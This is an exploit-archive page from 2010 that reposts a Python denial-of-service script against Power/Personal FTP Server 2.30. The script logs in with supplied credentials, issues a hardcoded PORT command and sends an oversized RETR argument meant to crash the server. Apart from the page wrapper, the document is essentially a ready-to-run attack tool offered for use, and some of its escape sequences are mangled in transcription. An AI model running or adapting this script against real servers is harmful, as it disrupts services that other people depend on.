Home / os / win7

Power/Personat FTP 2.30 Server RETR Command DoS

Posted on 15 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Power/Personat FTP 2.30 Server RETR Command DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===============================================
Power/Personat FTP 2.30 Server RETR Command DoS
=============================================== 


#!/usr/bin/python

#--------------------------------------------
# Power/Personal FTP Server RETR Command DoS
#--------------------------------------------

# Title: Power/Personat FTP Server RETR Command DoS
# Author: antrhacks
# Specifically for Inj3ct0r.com (Exploit DataBase)
# Software Link: http://www.cooolsoft.com/download/PowerFTP.EXE
# Version: 2.30
# Platform:  Windows XP SP3 Home edition Fr
# Tested with buffersize: 82000, 83000, 84000, ... 92000
# Example: ./PowerFTP.py 192.168.0.10 test test 85000 
 
import socket
import sys
 
# Description:
# RETR command overflow with PORT specified
 
def howto():
    print (&quot;Usage: scriptname.py &lt;IP&gt; &lt;username&gt; &lt;password&gt; &lt;buffersize&gt;
&quot;)
 
def exploit(host,user,password):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(('0.0.0.0', 6666)) # Need that for the PORT Command !!! 
    try:
        sock.connect((host, 21))
    except:
        print (&quot;Unable to connect to host&quot;)
        sys.exit(1)
    r=sock.recv(1024)
    print r 
    r=sock.getsockname()
    print r
    sock.send(&quot;USER &quot; + user + &quot;
&quot;)
    r=sock.recv(1024)
    print r
    sock.send(&quot;PASS &quot; + password + &quot;
&quot;)
    r=sock.recv(1024)
    print r
    sock.send(&quot;PORT 192,168,0,11,26,10&quot; + &quot;
&quot;) # 26,10 =&gt; 0x1a,0x0a =&gt; 6666
    r=sock.recv(1024)
    print r
    sock.send(&quot;RETR &quot; + buffer + &quot; 
&quot;)
    r=sock.recv(1024)
    print r
    sock.send(&quot;QUIT&quot; + &quot; 
&quot;)
    r=sock.recv(1024)
    print r
    sock.close()
         
if len(sys.argv) &lt;&gt; 5:
    howto()
    sys.exit(1)
else:
    host=sys.argv[1]
    user=sys.argv[2]
    password=sys.argv[3]
    buffersize=int(sys.argv[4])
    buffer=&quot;x0ax0a&quot; * buffersize
    exploit(host,user,password)
    sys.exit(0)
 
# END


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :